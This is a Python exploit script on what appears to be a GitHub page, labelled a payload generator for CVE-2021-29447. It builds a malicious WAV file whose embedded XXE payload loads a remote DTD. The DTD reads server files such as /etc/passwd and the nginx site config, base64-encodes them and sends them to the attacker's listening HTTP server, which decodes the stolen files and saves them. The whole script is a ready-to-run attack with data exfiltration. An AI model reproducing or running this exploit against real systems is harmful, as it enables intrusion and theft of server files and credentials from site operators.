-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathgenerate_payloads.py
executable file
·178 lines (145 loc) · 5.89 KB
/
generate_payloads.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
#!/usr/bin/python
import argparse
import base64
import logging
from functools import partial
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List
from urllib.parse import parse_qs, urlparse
from colored_formatter import ColoredFormatter
logging.root.setLevel(logging.NOTSET)
logger = logging.getLogger(__file__)
color_handler = logging.StreamHandler()
color_handler.setLevel(logging.DEBUG)
color_handler.setFormatter(ColoredFormatter())
logger.addHandler(color_handler)
DEFAULT_REMOTE_FILES_TO_FETCH = [
"/etc/passwd",
"/etc/nginx/sites-enabled/default",
]
SEPARATOR = "---"
class ExploitHandler(BaseHTTPRequestHandler):
def __init__(self, dtd_payload, *args, **kwargs):
self.dtd_payload = dtd_payload
super().__init__(*args, **kwargs)
def do_HEAD(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
def do_GET(self):
self.do_HEAD()
if self.path == f"/{self.dtd_payload}":
with open(self.dtd_payload, "rb") as file:
file_content = file.read()
self.wfile.write(file_content)
logger.info(
"dtd payload has been succesfully loaded onto the target server."
)
logger.info(
"We should expect a callback shortly, if nothing happens this might mean that one of the requested files does not exist on the target system"
)
elif self.path.startswith("/?"):
processed_path = self.path.replace(SEPARATOR, "&")
parsed_request_url = urlparse(processed_path)
extracted_files = parse_qs(parsed_request_url.query)
logger.info(
f"Received the following files: {', '.join(extracted_files.keys())}"
)
extracted_files = sanitize_extracted_files(extracted_files)
write_extracted_files(extracted_files)
logger.info("The files have been written to the current working directory")
else:
logger.debug(self.path)
def log_message(self, format, *args):
return
def create_args_parser():
parser = argparse.ArgumentParser(description="CVE-2021-29447 payload generator")
parser.add_argument(
"--local-ip", type=str, dest="local_ip", help="Local machine IP address"
)
parser.add_argument(
"--local-port",
type=int,
dest="local_port",
default=4444,
help="Local machine port which will run an HTTP server to receive the exfiltrated files",
)
parser.add_argument(
"--media-payload",
type=str,
dest="media_payload",
default="payload.wav",
help="Name of the .wav file containing the exploit to be generated",
)
parser.add_argument(
"--dtd-payload",
type=str,
dest="dtd_payload",
default="index.dtd",
help="Name of the .dtd file containing the exploit to be generated",
)
parser.add_argument(
"--files-to-fetch",
dest="files_to_fetch",
nargs="+",
help="",
default=DEFAULT_REMOTE_FILES_TO_FETCH,
)
return parser
def sanitize_extracted_files(extracted_files: List[Dict]) -> List[Dict]:
for extracted_file in extracted_files:
extracted_files[extracted_file] = extracted_files[extracted_file][0].replace(
" ", "+"
)
return extracted_files
def write_extracted_files(extracted_files: List[Dict]):
for extracted_file in extracted_files:
with open(extracted_file, "w") as new_file:
new_file.write(
base64.b64decode(extracted_files[extracted_file]).decode("utf-8")
)
def generate_wav_media_payload(
media_payload_file_path: str, ip_address: str, port: str, dtd_payload_file_path: str
):
logger.info(
f"Generating media payload [connect_back ip address: {ip_address}, connect back port: {port}]"
)
media_payload = f"RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://{ip_address}:{port}/{dtd_payload_file_path}'>%remote;%init;%trick;]>\x00"
with open(media_payload_file_path, "w", encoding="latin-1") as media_payload_file:
media_payload_file.write(media_payload)
logger.info(f"Payload generated and stored in {media_payload_file_path}")
def generate_dtd_payload(
dtd_payload_file_path: str, files_to_fetch: List[str], ip_address: str, port: str
):
logger.info(
f"Generating the dtd payload to extract the following files: {', '.join(files_to_fetch)}"
)
read_and_encode_local_files = ""
exfil_local_files = (
f"<!ENTITY % init \"<!ENTITY % trick SYSTEM 'http://{ip_address}:{port}/?"
)
for remote_file in files_to_fetch:
normalized_remote_file = remote_file.replace("/", "_")
read_and_encode_local_files += f'<!ENTITY % {normalized_remote_file} SYSTEM "php://filter/read=convert.base64-encode/resource={remote_file}">'
exfil_local_files += (
f"{normalized_remote_file}=%{normalized_remote_file};{SEPARATOR}"
)
exfil_local_files += "'>\" >"
with open(dtd_payload_file_path, "w") as dtd_file:
dtd_file.write(read_and_encode_local_files + exfil_local_files)
def main():
parser = create_args_parser()
args = parser.parse_args()
ip_address = args.local_ip
port = args.local_port
media_payload = args.media_payload
dtd_payload = args.dtd_payload
files_to_fetch = args.files_to_fetch
generate_wav_media_payload(media_payload, ip_address, port, dtd_payload)
generate_dtd_payload(dtd_payload, files_to_fetch, ip_address, port)
handler = partial(ExploitHandler, dtd_payload)
server = HTTPServer(("", int(port)), handler)
logger.info("Starting server, use <Ctrl-C> to stop")
server.serve_forever()
if __name__ == "__main__":
main()